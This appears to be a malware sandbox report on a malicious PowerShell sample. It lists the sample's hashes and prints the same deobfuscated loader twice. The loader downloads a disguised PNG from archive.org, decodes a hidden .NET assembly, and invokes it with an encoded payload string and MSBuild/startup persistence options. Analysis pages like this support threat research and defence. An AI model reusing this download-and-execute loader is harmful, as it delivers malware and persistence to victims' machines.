Malicious
Malicious

d65e895e96bfcd528a74bd6278e67841

PowerShell
|
MD5: d65e895e96bfcd528a74bd6278e67841
|
Size: 1.03 MB
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d65e895e96bfcd528a74bd6278e67841
Sha1
507b32bd72061c6a7794d9c4d9267cd2c9e45ea3
Sha256
34d6e23994ad8b890e50be8487a4a405310f1616df5e23b1639e5fbc540deffc
Sha384
e456c4d9bd81362a17d550e369e57552616fa20b0d91368d0056d80db9b6f34f2fc01e7b4ce4f91d0d7dd48dbe07d775
Sha512
155f2a76aaf57548fc972c876840389d7f3ebda00b6348515cb79d54ad742230fbbe333548ec4185fb01058891387aeb3f42b2091b9d361a6235166b3b9e74be
SSDeep
12288:awt4c9W3mDO1GzTR2Fwt4c9W3mDO1GzTR23wt4c9W3mDO1GzTR2m:Z4+W2KFy4+W2KFw4+W2KFm
TLSH
2425CF5E352A457E6586B0B822094172F08EC7E1C36EE3F2D460D868E095CBDD1BE7B7
File Structure
d65e895e96bfcd528a74bd6278e67841
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Artefacts
Name
 Value
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==gJlVjZ5ImZ ykTZ3IjM1IWOlZ2Y5cjM0QGNjJzMlFGO4ITM0UWM4UDOzMmZyQDOzYmZlRWZkNTMxQDOldzNwgjZ 40TboZyMilTYwEGO20zcpZyMzImZxEGO20Del9Dd4RnLNZ1LzUTN5IzN0UTM0ETM1AzM2ADNx8yN 1gTO3UDO3YTOyATN4YjMwQTMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))
d65e895e96bfcd528a74bd6278e67841 (1.03 MB)
File Structure
d65e895e96bfcd528a74bd6278e67841
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==gJlVjZ5ImZ ykTZ3IjM1IWOlZ2Y5cjM0QGNjJzMlFGO4ITM0UWM4UDOzMmZyQDOzYmZlRWZkNTMxQDOldzNwgjZ 40TboZyMilTYwEGO20zcpZyMzImZxEGO20Del9Dd4RnLNZ1LzUTN5IzN0UTM0ETM1AzM2ADNx8yN 1gTO3UDO3YTOyATN4YjMwQTMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))

Malicious

d65e895e96bfcd528a74bd6278e67841 > [Base64-Block]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙